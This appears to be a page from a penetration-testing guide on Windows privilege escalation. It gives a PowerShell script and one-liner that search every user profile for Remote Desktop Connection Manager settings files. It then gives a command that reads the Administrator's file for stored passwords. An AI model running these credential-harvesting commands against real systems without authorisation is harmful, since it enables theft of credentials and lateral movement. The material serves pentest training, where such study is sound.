Checking Remote Desktop Connection Manager

Sometimes, the Remote Desktop Connection Manager file has a Stored credential, we can use this to credential for privilege escalation or lateral movement.

Checking for the Presence of RDCMan

Get-ChildItem -Path 'C:\Users' -Directory | ForEach-Object {
    $userPath = $_.FullName
    $rdcPath = Join-Path -Path $userPath -ChildPath 'AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'
    Write-Host "----------------------------------------" -ForegroundColor Cyan
    Write-Host "Checking for user: $($_.Name)" -ForegroundColor Blue
    if (Test-Path $rdcPath) {
        Write-Host "RDCMan Settings Found for user: $($_.Name)" -ForegroundColor Green
        Write-Host "Path: $rdcPath" -ForegroundColor Yellow
    } else {
        Write-Host "No RDCMan.Settings found for user: $($_.Name)" -ForegroundColor Red
    }
    Write-Host "----------------------------------------" -ForegroundColor Cyan
}

One Liner:

Get-ChildItem -Path 'C:\Users' -Directory | ForEach-Object { $userPath = $_.FullName; $rdcPath = Join-Path -Path $userPath -ChildPath 'AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'; Write-Host "----------------------------------------" -ForegroundColor Cyan; Write-Host "Checking for user: $($_.Name)" -ForegroundColor Blue; if (Test-Path $rdcPath) { Write-Host "RDCMan Settings Found for user: $($_.Name)" -ForegroundColor Green; Write-Host "Path: $rdcPath" -ForegroundColor Yellow } else { Write-Host "No RDCMan.Settings found for user: $($_.Name)" -ForegroundColor Red }; Write-Host "----------------------------------------" -ForegroundColor Cyan }

If Found

If you found this file then look for sensitive information in it.

cat "C:\Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" | Select-String -Pattern "password|pass" -Context 2,2

PreviousAbusing Other Windows Components NextAbusing GPO

Last updated 11 months ago